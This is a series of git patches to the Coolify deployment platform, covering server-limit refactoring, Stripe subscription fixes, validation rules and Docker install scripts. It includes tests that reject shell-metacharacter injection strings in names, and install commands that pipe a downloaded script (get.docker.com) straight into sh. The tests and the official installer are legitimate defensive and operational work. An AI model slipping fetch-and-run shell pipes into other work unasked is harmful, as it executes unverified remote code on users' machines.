+    // Verify it's wrapped in docker exec bash -c
+    expect($dockerCmd)->toStartWith("docker exec test-container bash -c '");
+    expect($dockerCmd)->toEndWith("'");
+});
+
+it('produces correct output for build-cmd with chained commands through executeInDocker', function () {
+    $buildCmd = 'npx prisma generate && npm run build';
+    $escapedCmd = escapeShellValue($buildCmd);
+
+    $command = "nixpacks plan -f json --build-cmd {$escapedCmd} /app";
+    $dockerCmd = executeInDocker('test-container', $command);
+
+    // The build command value must remain intact inside the quoting
+    expect($dockerCmd)->toContain('npx prisma generate && npm run build');
+    expect($dockerCmd)->toStartWith("docker exec test-container bash -c '");
+});

From e37cb98c7c24e078a11cff92cd080578cd4ca08d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 21:56:50 +0100
Subject: [PATCH 112/213] refactor(team): make server limit methods accept
 optional team parameter

Allow serverLimit() and serverLimitReached() to accept an optional team
parameter instead of relying solely on the current session. This improves
testability and makes the methods more flexible by allowing them to work
without session state.

Add comprehensive tests covering various scenarios including no session,
team at limit, and team under limit.
---
 .../Controllers/Api/HetznerController.php     |  3 +-
 app/Models/Team.php                           | 19 ++++---
 tests/Feature/TeamServerLimitTest.php         | 53 +++++++++++++++++++
 3 files changed, 68 insertions(+), 7 deletions(-)
 create mode 100644 tests/Feature/TeamServerLimitTest.php

diff --git a/app/Http/Controllers/Api/HetznerController.php b/app/Http/Controllers/Api/HetznerController.php
index 2645c2df1..ed91b4475 100644
--- a/app/Http/Controllers/Api/HetznerController.php
+++ b/app/Http/Controllers/Api/HetznerController.php
@@ -586,7 +586,8 @@ public function createServer(Request $request)
         }
 
         // Check server limit
-        if (Team::serverLimitReached()) {
+        $team = Team::find($teamId);
+        if (Team::serverLimitReached($team)) {
             return response()->json(['message' => 'Server limit reached for your subscription.'], 400);
         }
 
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 10b22b4e1..639d50b60 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -89,10 +89,13 @@ protected static function booted()
         });
     }
 
-    public static function serverLimitReached()
+    public static function serverLimitReached(?Team $team = null)
     {
-        $serverLimit = Team::serverLimit();
-        $team = currentTeam();
+        $team = $team ?? currentTeam();
+        if (! $team) {
+            return true;
+        }
+        $serverLimit = Team::serverLimit($team);
         $servers = $team->servers->count();
 
         return $servers >= $serverLimit;
@@ -116,12 +119,16 @@ public function serverOverflow()
         return false;
     }
 
-    public static function serverLimit()
+    public static function serverLimit(?Team $team = null)
     {
-        if (currentTeam()->id === 0 && isDev()) {
+        $team = $team ?? currentTeam();
+        if (! $team) {
+            return 0;
+        }
+        if ($team->id === 0 && isDev()) {
             return 9999999;
         }
-        $team = Team::find(currentTeam()->id);
+        $team = Team::find($team->id);
         if (! $team) {
             return 0;
         }
diff --git a/tests/Feature/TeamServerLimitTest.php b/tests/Feature/TeamServerLimitTest.php
new file mode 100644
index 000000000..11d7f09d1
--- /dev/null
+++ b/tests/Feature/TeamServerLimitTest.php
@@ -0,0 +1,53 @@
+<?php
+
+use App\Models\Server;
+use App\Models\Team;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    config()->set('constants.coolify.self_hosted', true);
+});
+
+it('returns server limit when team is passed directly without session', function () {
+    $team = Team::factory()->create();
+
+    $limit = Team::serverLimit($team);
+
+    // self_hosted returns 999999999999
+    expect($limit)->toBe(999999999999);
+});
+
+it('returns 0 when no team is provided and no session exists', function () {
+    $limit = Team::serverLimit();
+
+    expect($limit)->toBe(0);
+});
+
+it('returns true for serverLimitReached when no team and no session', function () {
+    $result = Team::serverLimitReached();
+
+    expect($result)->toBeTrue();
+});
+
+it('returns false for serverLimitReached when team has servers under limit', function () {
+    $team = Team::factory()->create();
+    Server::factory()->create(['team_id' => $team->id]);
+
+    $result = Team::serverLimitReached($team);
+
+    // self_hosted has very high limit, 1 server is well under
+    expect($result)->toBeFalse();
+});
+
+it('returns true for serverLimitReached when team has servers at limit', function () {
+    config()->set('constants.coolify.self_hosted', false);
+
+    $team = Team::factory()->create(['custom_server_limit' => 1]);
+    Server::factory()->create(['team_id' => $team->id]);
+
+    $result = Team::serverLimitReached($team);
+
+    expect($result)->toBeTrue();
+});

From ffd69c1b545078cc63982effdca81b6d861aada6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=F0=9F=8F=94=EF=B8=8F=20Peak?=
 <122374094+peaklabs-dev@users.noreply.github.com>
Date: Mon, 23 Mar 2026 22:45:18 +0100
Subject: [PATCH 113/213] ci: update pr-quality.yaml

---
 .github/workflows/pr-quality.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/pr-quality.yaml b/.github/workflows/pr-quality.yaml
index 594724fdb..45a695ddc 100644
--- a/.github/workflows/pr-quality.yaml
+++ b/.github/workflows/pr-quality.yaml
@@ -40,7 +40,10 @@ jobs:
           max-emoji-count: 2
           max-code-references: 5
           require-linked-issue: false
-          blocked-terms: "STRAWBERRY"
+          blocked-terms:  |
+            STRAWBERRY
+            🤖 Generated with Claude Code
+            Generated with Claude Code
           blocked-issue-numbers: 8154
 
           # PR Template Checks
@@ -97,7 +100,7 @@ jobs:
           exempt-pr-milestones: ""
 
           # PR Success Actions
-          success-add-pr-labels: "quality/verified"
+          success-add-pr-labels: ""
 
           # PR Failure Actions
           failure-remove-pr-labels: ""

From 988dd57cf4f30fcaee3df22f9500d13372ff791e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 08:03:08 +0100
Subject: [PATCH 114/213] feat(validation): make hostname validation
 case-insensitive and expand allowed characters

- Normalize hostnames to lowercase for RFC 1123 compliance while accepting uppercase input
- Expand NAME_PATTERN to allow parentheses, hash, comma, colon, and plus characters
- Add fallback to random name generation when application name doesn't meet minimum requirements
- Add comprehensive test coverage for validation patterns and edge cases
---
 app/Rules/ValidHostname.php           |  9 ++-
 app/Support/ValidationPatterns.php    |  4 +-
 bootstrap/helpers/shared.php          | 11 +++-
 tests/Unit/ValidHostnameTest.php      | 11 ++--
 tests/Unit/ValidationPatternsTest.php | 82 +++++++++++++++++++++++++++
 5 files changed, 106 insertions(+), 11 deletions(-)
 create mode 100644 tests/Unit/ValidationPatternsTest.php

diff --git a/app/Rules/ValidHostname.php b/app/Rules/ValidHostname.php
index b6b2b8d32..89b68663b 100644
--- a/app/Rules/ValidHostname.php
+++ b/app/Rules/ValidHostname.php
@@ -62,12 +62,15 @@ public function validate(string $attribute, mixed $value, Closure $fail): void
                     // Ignore errors when facades are not available (e.g., in unit tests)
                 }
 
-                $fail('The :attribute contains invalid characters. Only lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.) are allowed.');
+                $fail('The :attribute contains invalid characters. Only letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.) are allowed.');
 
                 return;
             }
         }
 
+        // Normalize to lowercase for validation (RFC 1123 hostnames are case-insensitive)
+        $hostname = strtolower($hostname);
+
         // Additional validation: hostname should not start or end with a dot
         if (str_starts_with($hostname, '.') || str_ends_with($hostname, '.')) {
             $fail('The :attribute cannot start or end with a dot.');
@@ -100,9 +103,9 @@ public function validate(string $attribute, mixed $value, Closure $fail): void
                 return;
             }
 
-            // Check if label contains only valid characters (lowercase letters, digits, hyphens)
+            // Check if label contains only valid characters (letters, digits, hyphens)
             if (! preg_match('/^[a-z0-9-]+$/', $label)) {
-                $fail('The :attribute contains invalid characters. Only lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.) are allowed.');
+                $fail('The :attribute contains invalid characters. Only letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.) are allowed.');
 
                 return;
             }
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index fdf2b12a6..7b8251729 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -10,7 +10,7 @@ class ValidationPatterns
     /**
      * Pattern for names excluding all dangerous characters
      */
-    public const NAME_PATTERN = '/^[\p{L}\p{M}\p{N}\s\-_.@\/&]+$/u';
+    public const NAME_PATTERN = '/^[\p{L}\p{M}\p{N}\s\-_.@\/&()#,:+]+$/u';
 
     /**
      * Pattern for descriptions excluding all dangerous characters with some additional allowed characters
@@ -96,7 +96,7 @@ public static function descriptionRules(bool $required = false, int $maxLength =
     public static function nameMessages(): array
     {
         return [
-            'name.regex' => 'The name may only contain letters (including Unicode), numbers, spaces, and these characters: - _ . / @ &',
+            'name.regex' => 'The name may only contain letters (including Unicode), numbers, spaces, and these characters: - _ . / @ & ( ) # , : +',
             'name.min' => 'The name must be at least :min characters.',
             'name.max' => 'The name may not be greater than :max characters.',
         ];
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index ce9ab5283..a8cffcaff 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -341,7 +341,16 @@ function generate_application_name(string $git_repository, string $git_branch, ?
 
     $repo_name = str_contains($git_repository, '/') ? last(explode('/', $git_repository)) : $git_repository;
 
-    return Str::kebab("$repo_name:$git_branch-$cuid");
+    $name = Str::kebab("$repo_name:$git_branch-$cuid");
+
+    // Strip characters not allowed by NAME_PATTERN
+    $name = preg_replace('/[^\p{L}\p{M}\p{N}\s\-_.@\/&()#,:+]+/u', '', $name);
+
+    if (empty($name) || mb_strlen($name) < 3) {
+        return generate_random_name($cuid);
+    }
+
+    return $name;
 }
 
 /**
diff --git a/tests/Unit/ValidHostnameTest.php b/tests/Unit/ValidHostnameTest.php
index 859262c3e..6580a7c5d 100644
--- a/tests/Unit/ValidHostnameTest.php
+++ b/tests/Unit/ValidHostnameTest.php
@@ -21,6 +21,8 @@
     'subdomain' => 'web.app.example.com',
     'max label length' => str_repeat('a', 63),
     'max total length' => str_repeat('a', 63).'.'.str_repeat('b', 63).'.'.str_repeat('c', 63).'.'.str_repeat('d', 59),
+    'uppercase hostname' => 'MyServer',
+    'mixed case fqdn' => 'MyServer.Example.COM',
 ]);
 
 it('rejects invalid RFC 1123 hostnames', function (string $hostname, string $expectedError) {
@@ -36,8 +38,7 @@
     expect($failCalled)->toBeTrue();
     expect($errorMessage)->toContain($expectedError);
 })->with([
-    'uppercase letters' => ['MyServer', 'lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.)'],
-    'underscore' => ['my_server', 'lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.)'],
+    'underscore' => ['my_server', 'letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.)'],
     'starts with hyphen' => ['-myserver', 'cannot start or end with a hyphen'],
     'ends with hyphen' => ['myserver-', 'cannot start or end with a hyphen'],
     'starts with dot' => ['.myserver', 'cannot start or end with a dot'],
@@ -46,9 +47,9 @@
     'too long total' => [str_repeat('a', 254), 'must not exceed 253 characters'],
     'label too long' => [str_repeat('a', 64), 'must be 1-63 characters'],
     'empty label' => ['my..server', 'consecutive dots'],
-    'special characters' => ['my@server', 'lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.)'],
-    'space' => ['my server', 'lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.)'],
-    'shell metacharacters' => ['my;server', 'lowercase letters (a-z), numbers (0-9), hyphens (-), and dots (.)'],
+    'special characters' => ['my@server', 'letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.)'],
+    'space' => ['my server', 'letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.)'],
+    'shell metacharacters' => ['my;server', 'letters (a-z, A-Z), numbers (0-9), hyphens (-), and dots (.)'],
 ]);
 
 it('accepts empty hostname', function () {
diff --git a/tests/Unit/ValidationPatternsTest.php b/tests/Unit/ValidationPatternsTest.php
new file mode 100644
index 000000000..0da8f9a4d
--- /dev/null
+++ b/tests/Unit/ValidationPatternsTest.php
@@ -0,0 +1,82 @@
+<?php
+
+use App\Support\ValidationPatterns;
+
+it('accepts valid names with common characters', function (string $name) {
+    expect(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
+})->with([
+    'simple name' => 'My Server',
+    'name with hyphen' => 'my-server',
+    'name with underscore' => 'my_server',
+    'name with dot' => 'my.server',
+    'name with slash' => 'my/server',
+    'name with at sign' => 'user@host',
+    'name with ampersand' => 'Tom & Jerry',
+    'name with parentheses' => 'My Server (Production)',
+    'name with hash' => 'Server #1',
+    'name with comma' => 'Server, v2',
+    'name with colon' => 'Server: Production',
+    'name with plus' => 'C++ App',
+    'unicode name' => 'Ünïcödé Sërvér',
+    'unicode chinese' => '我的服务器',
+    'numeric name' => '12345',
+    'complex name' => 'App #3 (staging): v2.1+hotfix',
+]);
+
+it('rejects names with dangerous characters', function (string $name) {
+    expect(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(0);
+})->with([
+    'semicolon' => 'my;server',
+    'pipe' => 'my|server',
+    'dollar sign' => 'my$server',
+    'backtick' => 'my`server',
+    'backslash' => 'my\\server',
+    'less than' => 'my<server',
+    'greater than' => 'my>server',
+    'curly braces' => 'my{server}',
+    'square brackets' => 'my[server]',
+    'tilde' => 'my~server',
+    'caret' => 'my^server',
+    'question mark' => 'my?server',
+    'percent' => 'my%server',
+    'double quote' => 'my"server',
+    'exclamation' => 'my!server',
+    'asterisk' => 'my*server',
+]);
+
+it('generates nameRules with correct defaults', function () {
+    $rules = ValidationPatterns::nameRules();
+
+    expect($rules)->toContain('required')
+        ->toContain('string')
+        ->toContain('min:3')
+        ->toContain('max:255')
+        ->toContain('regex:'.ValidationPatterns::NAME_PATTERN);
+});
+
+it('generates nullable nameRules when not required', function () {
+    $rules = ValidationPatterns::nameRules(required: false);
+
+    expect($rules)->toContain('nullable')
+        ->not->toContain('required');
+});
+
+it('generates application names that comply with NAME_PATTERN', function (string $repo, string $branch) {
+    $name = generate_application_name($repo, $branch, 'testcuid');
+
+    expect(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
+})->with([
+    'normal repo' => ['owner/my-app', 'main'],
+    'repo with dots' => ['repo.with.dots', 'feat/branch'],
+    'repo with plus' => ['C++ App', 'main'],
+    'branch with parens' => ['my-app', 'fix(auth)-login'],
+    'repo with exclamation' => ['my-app!', 'main'],
+    'repo with brackets' => ['app[test]', 'develop'],
+]);
+
+it('falls back to random name when repo produces empty name', function () {
+    $name = generate_application_name('!!!', 'main', 'testcuid');
+
+    expect(mb_strlen($name))->toBeGreaterThanOrEqual(3)
+        ->and(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
+});

From 520e048ed5b4c8d86f3b2cfc9024aaa5725a6743 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 08:08:57 +0100
Subject: [PATCH 115/213] refactor(team): update serverOverflow to use static
 serverLimit

---
 app/Models/Team.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/app/Models/Team.php b/app/Models/Team.php
index 639d50b60..5a7b377b6 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -112,7 +112,7 @@ public function subscriptionPastOverDue()
 
     public function serverOverflow()
     {
-        if ($this->serverLimit() < $this->servers->count()) {
+        if (Team::serverLimit($this) < $this->servers->count()) {
             return true;
         }
 

From d3beeb2d000229868127400de2ac3867902414ae Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 10:52:41 +0100
Subject: [PATCH 116/213] fix(subscription): prevent duplicate subscriptions
 with updateOrCreate

- Replace manual subscription create/update logic with updateOrCreate() and firstOrCreate() to eliminate race conditions
- Add validation in PricingPlans to prevent subscribing if team already has active subscription
- Improve error handling for missing team_id in customer.subscription.updated event
- Add tests verifying subscriptions are updated rather than duplicated
---
 app/Jobs/StripeProcessJob.php                 | 51 ++++-------
 app/Livewire/Subscription/PricingPlans.php    |  6 ++
 .../Subscription/StripeProcessJobTest.php     | 87 +++++++++++++++++++
 3 files changed, 111 insertions(+), 33 deletions(-)

diff --git a/app/Jobs/StripeProcessJob.php b/app/Jobs/StripeProcessJob.php
index f5d52f29c..3485ffe32 100644
--- a/app/Jobs/StripeProcessJob.php
+++ b/app/Jobs/StripeProcessJob.php
@@ -73,25 +73,15 @@ public function handle(): void
                         // send_internal_notification("User {$userId} is not an admin or owner of team {$team->id}, customerid: {$customerId}, subscriptionid: {$subscriptionId}.");
                         throw new \RuntimeException("User {$userId} is not an admin or owner of team {$team->id}, customerid: {$customerId}, subscriptionid: {$subscriptionId}.");
                     }
-                    $subscription = Subscription::where('team_id', $teamId)->first();
-                    if ($subscription) {
-                        // send_internal_notification('Old subscription activated for team: '.$teamId);
-                        $subscription->update([
+                    Subscription::updateOrCreate(
+                        ['team_id' => $teamId],
+                        [
                             'stripe_subscription_id' => $subscriptionId,
                             'stripe_customer_id' => $customerId,
                             'stripe_invoice_paid' => true,
                             'stripe_past_due' => false,
-                        ]);
-                    } else {
-                        // send_internal_notification('New subscription for team: '.$teamId);
-                        Subscription::create([
-                            'team_id' => $teamId,
-                            'stripe_subscription_id' => $subscriptionId,
-                            'stripe_customer_id' => $customerId,
-                            'stripe_invoice_paid' => true,
-                            'stripe_past_due' => false,
-                        ]);
-                    }
+                        ]
+                    );
                     break;
                 case 'invoice.paid':
                     $customerId = data_get($data, 'customer');
@@ -227,18 +217,14 @@ public function handle(): void
                         // send_internal_notification("User {$userId} is not an admin or owner of team {$team->id}, customerid: {$customerId}.");
                         throw new \RuntimeException("User {$userId} is not an admin or owner of team {$team->id}, customerid: {$customerId}.");
                     }
-                    $subscription = Subscription::where('team_id', $teamId)->first();
-                    if ($subscription) {
-                        // send_internal_notification("Subscription already exists for team: {$teamId}");
-                        throw new \RuntimeException("Subscription already exists for team: {$teamId}");
-                    } else {
-                        Subscription::create([
-                            'team_id' => $teamId,
+                    Subscription::updateOrCreate(
+                        ['team_id' => $teamId],
+                        [
                             'stripe_subscription_id' => $subscriptionId,
                             'stripe_customer_id' => $customerId,
                             'stripe_invoice_paid' => false,
-                        ]);
-                    }
+                        ]
+                    );
                     break;
                 case 'customer.subscription.updated':
                     $teamId = data_get($data, 'metadata.team_id');
@@ -254,20 +240,19 @@ public function handle(): void
                     $subscription = Subscription::where('stripe_customer_id', $customerId)->first();
                     if (! $subscription) {
                         if ($status === 'incomplete_expired') {
-                            // send_internal_notification('Subscription incomplete expired');
                             throw new \RuntimeException('Subscription incomplete expired');
                         }
-                        if ($teamId) {
-                            $subscription = Subscription::create([
-                                'team_id' => $teamId,
+                        if (! $teamId) {
+                            throw new \RuntimeException('No subscription and team id found');
+                        }
+                        $subscription = Subscription::firstOrCreate(
+                            ['team_id' => $teamId],
+                            [
                                 'stripe_subscription_id' => $subscriptionId,
                                 'stripe_customer_id' => $customerId,
                                 'stripe_invoice_paid' => false,
-                            ]);
-                        } else {
-                            // send_internal_notification('No subscription and team id found');
-                            throw new \RuntimeException('No subscription and team id found');
-                        }
+                            ]
+                        );
                     }
                     $cancelAtPeriodEnd = data_get($data, 'cancel_at_period_end');
                     $feedback = data_get($data, 'cancellation_details.feedback');
diff --git a/app/Livewire/Subscription/PricingPlans.php b/app/Livewire/Subscription/PricingPlans.php
index 6b2d3fb36..6e1b85404 100644
--- a/app/Livewire/Subscription/PricingPlans.php
+++ b/app/Livewire/Subscription/PricingPlans.php
@@ -11,6 +11,12 @@ class PricingPlans extends Component
 {
     public function subscribeStripe($type)
     {
+        if (currentTeam()->subscription?->stripe_invoice_paid) {
+            $this->dispatch('error', 'Team already has an active subscription.');
+
+            return;
+        }
+
         Stripe::setApiKey(config('subscription.stripe_api_key'));
 
         $priceId = match ($type) {
diff --git a/tests/Feature/Subscription/StripeProcessJobTest.php b/tests/Feature/Subscription/StripeProcessJobTest.php
index 95cff188a..0a93f858c 100644
--- a/tests/Feature/Subscription/StripeProcessJobTest.php
+++ b/tests/Feature/Subscription/StripeProcessJobTest.php
@@ -50,6 +50,93 @@
         // Critical: stripe_invoice_paid must remain false — payment not yet confirmed
         expect($subscription->stripe_invoice_paid)->toBeFalsy();
     });
+
+    test('created event updates existing subscription instead of duplicating', function () {
+        Queue::fake();
+
+        Subscription::create([
+            'team_id' => $this->team->id,
+            'stripe_subscription_id' => 'sub_old',
+            'stripe_customer_id' => 'cus_old',
+            'stripe_invoice_paid' => true,
+        ]);
+
+        $event = [
+            'type' => 'customer.subscription.created',
+            'data' => [
+                'object' => [
+                    'customer' => 'cus_new_123',
+                    'id' => 'sub_new_123',
+                    'metadata' => [
+                        'team_id' => $this->team->id,
+                        'user_id' => $this->user->id,
+                    ],
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        expect(Subscription::where('team_id', $this->team->id)->count())->toBe(1);
+        $subscription = Subscription::where('team_id', $this->team->id)->first();
+        expect($subscription->stripe_subscription_id)->toBe('sub_new_123');
+        expect($subscription->stripe_customer_id)->toBe('cus_new_123');
+    });
+});
+
+describe('checkout.session.completed', function () {
+    test('creates subscription for new team', function () {
+        Queue::fake();
+
+        $event = [
+            'type' => 'checkout.session.completed',
+            'data' => [
+                'object' => [
+                    'client_reference_id' => $this->user->id.':'.$this->team->id,
+                    'subscription' => 'sub_checkout_123',
+                    'customer' => 'cus_checkout_123',
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        $subscription = Subscription::where('team_id', $this->team->id)->first();
+        expect($subscription)->not->toBeNull();
+        expect($subscription->stripe_invoice_paid)->toBeTruthy();
+    });
+
+    test('updates existing subscription instead of duplicating', function () {
+        Queue::fake();
+
+        Subscription::create([
+            'team_id' => $this->team->id,
+            'stripe_subscription_id' => 'sub_old',
+            'stripe_customer_id' => 'cus_old',
+            'stripe_invoice_paid' => false,
+        ]);
+
+        $event = [
+            'type' => 'checkout.session.completed',
+            'data' => [
+                'object' => [
+                    'client_reference_id' => $this->user->id.':'.$this->team->id,
+                    'subscription' => 'sub_checkout_new',
+                    'customer' => 'cus_checkout_new',
+                ],
+            ],
+        ];
+
+        $job = new StripeProcessJob($event);
+        $job->handle();
+
+        expect(Subscription::where('team_id', $this->team->id)->count())->toBe(1);
+        $subscription = Subscription::where('team_id', $this->team->id)->first();
+        expect($subscription->stripe_subscription_id)->toBe('sub_checkout_new');
+        expect($subscription->stripe_invoice_paid)->toBeTruthy();
+    });
 });
 
 describe('customer.subscription.updated clamps quantity to MAX_SERVER_LIMIT', function () {

From a980b1352f0e0c61f28c6c5ec680a902c82232d6 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 11:48:04 +0100
Subject: [PATCH 117/213] chore(versions): bump sentinel to 0.0.21

---
 other/nightly/versions.json | 2 +-
 versions.json               | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 57bb21869..c2ab7a7c1 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -13,7 +13,7 @@
             "version": "1.0.11"
         },
         "sentinel": {
-            "version": "0.0.20"
+            "version": "0.0.21"
         }
     },
     "traefik": {
diff --git a/versions.json b/versions.json
index 57bb21869..c2ab7a7c1 100644
--- a/versions.json
+++ b/versions.json
@@ -13,7 +13,7 @@
             "version": "1.0.11"
         },
         "sentinel": {
-            "version": "0.0.20"
+            "version": "0.0.21"
         }
     },
     "traefik": {

From efcd5e7dbf254c87a3f4d56f3c3a01d89a6a8c3a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 12:37:11 +0100
Subject: [PATCH 118/213] docs(readme): add PetroSky Cloud to sponsors

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 73af2a18c..a5aa69343 100644
--- a/README.md
+++ b/README.md
@@ -90,6 +90,7 @@ ### Big Sponsors
 * [Logto](https://logto.io?ref=coolify.io) - The better identity infrastructure for developers
 * [Macarne](https://macarne.com?ref=coolify.io) - Best IP Transit & Carrier Ethernet Solutions for Simplified Network Connectivity
 * [Mobb](https://vibe.mobb.ai/?ref=coolify.io) - Secure Your AI-Generated Code to Unlock Dev Productivity
+* [PetroSky Cloud](https://petrosky.io?ref=coolify.io) - Open source cloud deployment solutions
 * [PFGLabs](https://pfglabs.com?ref=coolify.io) - Build Real Projects with Golang
 * [Ramnode](https://ramnode.com/?ref=coolify.io) - High Performance Cloud VPS Hosting
 * [SaasyKit](https://saasykit.com?ref=coolify.io) - Complete SaaS starter kit for developers

From 534b8be8d0927b5ff48ccf1da3dcfae6558e3eca Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 14:17:05 +0100
Subject: [PATCH 119/213] refactor(docker): simplify installation and remove
 version pinning
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Remove hardcoded Docker version constraints (27.0 → latest)
- Use official Docker install script (get.docker.com) instead of rancher URLs
- Simplify installation logic by removing nested version fallback checks
- Consolidate OS-specific installation methods and improve Arch Linux upgrade handling
---
 app/Actions/Server/InstallDocker.php | 15 ++-----
 other/nightly/install.sh             | 63 +++++++++++++---------------
 scripts/install.sh                   | 63 +++++++++++++---------------
 3 files changed, 62 insertions(+), 79 deletions(-)

diff --git a/app/Actions/Server/InstallDocker.php b/app/Actions/Server/InstallDocker.php
index 31e582c9b..2e08ec6ad 100644
--- a/app/Actions/Server/InstallDocker.php
+++ b/app/Actions/Server/InstallDocker.php
@@ -11,11 +11,8 @@ class InstallDocker
 {
     use AsAction;
 
-    private string $dockerVersion;
-
     public function handle(Server $server)
     {
-        $this->dockerVersion = config('constants.docker.minimum_required_version');
         $supported_os_type = $server->validateOS();
         if (! $supported_os_type) {
             throw new \Exception('Server OS type is not supported for automated installation. Please install Docker manually before continuing: <a target="_blank" class="underline" href="https://coolify.io/docs/installation#manually">documentation</a>.');
@@ -118,7 +115,7 @@ public function handle(Server $server)
 
     private function getDebianDockerInstallCommand(): string
     {
-        return "curl --max-time 300 --retry 3 https://releases.rancher.com/install-docker/{$this->dockerVersion}.sh | sh || curl --max-time 300 --retry 3 https://get.docker.com | sh -s -- --version {$this->dockerVersion} || (".
+        return 'curl -fsSL https://get.docker.com | sh || ('.
             '. /etc/os-release && '.
             'install -m 0755 -d /etc/apt/keyrings && '.
             'curl -fsSL https://download.docker.com/linux/${ID}/gpg -o /etc/apt/keyrings/docker.asc && '.
@@ -131,7 +128,7 @@ private function getDebianDockerInstallCommand(): string
 
     private function getRhelDockerInstallCommand(): string
     {
-        return "curl https://releases.rancher.com/install-docker/{$this->dockerVersion}.sh | sh || curl https://get.docker.com | sh -s -- --version {$this->dockerVersion} || (".
+        return 'curl -fsSL https://get.docker.com | sh || ('.
             'dnf config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo && '.
             'dnf install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin && '.
             'systemctl start docker && '.
@@ -141,7 +138,7 @@ private function getRhelDockerInstallCommand(): string
 
     private function getSuseDockerInstallCommand(): string
     {
-        return "curl https://releases.rancher.com/install-docker/{$this->dockerVersion}.sh | sh || curl https://get.docker.com | sh -s -- --version {$this->dockerVersion} || (".
+        return 'curl -fsSL https://get.docker.com | sh || ('.
             'zypper addrepo https://download.docker.com/linux/sles/docker-ce.repo && '.
             'zypper refresh && '.
             'zypper install -y --no-confirm docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin && '.
@@ -152,10 +149,6 @@ private function getSuseDockerInstallCommand(): string
 
     private function getArchDockerInstallCommand(): string
     {
-        // Use -Syu to perform full system upgrade before installing Docker
-        // Partial upgrades (-Sy without -u) are discouraged on Arch Linux
-        // as they can lead to broken dependencies and system instability
-        // Use --needed to skip reinstalling packages that are already up-to-date (idempotent)
         return 'pacman -Syu --noconfirm --needed docker docker-compose && '.
             'systemctl enable docker.service && '.
             'systemctl start docker.service';
@@ -163,6 +156,6 @@ private function getArchDockerInstallCommand(): string
 
     private function getGenericDockerInstallCommand(): string
     {
-        return "curl --max-time 300 --retry 3 https://releases.rancher.com/install-docker/{$this->dockerVersion}.sh | sh || curl --max-time 300 --retry 3 https://get.docker.com | sh -s -- --version {$this->dockerVersion}";
+        return 'curl -fsSL https://get.docker.com | sh';
     }
 }
diff --git a/other/nightly/install.sh b/other/nightly/install.sh
index 921ba6a92..09406118c 100755
--- a/other/nightly/install.sh
+++ b/other/nightly/install.sh
@@ -20,7 +20,7 @@ DATE=$(date +"%Y%m%d-%H%M%S")
 
 OS_TYPE=$(grep -w "ID" /etc/os-release | cut -d "=" -f 2 | tr -d '"')
 ENV_FILE="/data/coolify/source/.env"
-DOCKER_VERSION="27.0"
+DOCKER_VERSION="latest"
 # TODO: Ask for a user
 CURRENT_USER=$USER
 
@@ -499,13 +499,10 @@ fi
 
 install_docker() {
     set +e
-    curl -s https://releases.rancher.com/install-docker/${DOCKER_VERSION}.sh | sh 2>&1 || true
+    curl -fsSL https://get.docker.com | sh 2>&1 || true
     if ! [ -x "$(command -v docker)" ]; then
-        curl -s https://get.docker.com | sh -s -- --version ${DOCKER_VERSION} 2>&1
-        if ! [ -x "$(command -v docker)" ]; then
-            echo "Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
-        fi
+        echo "Automated Docker installation failed. Trying manual installation."
+        install_docker_manually
     fi
     set -e
 }
@@ -548,16 +545,6 @@ if ! [ -x "$(command -v docker)" ]; then
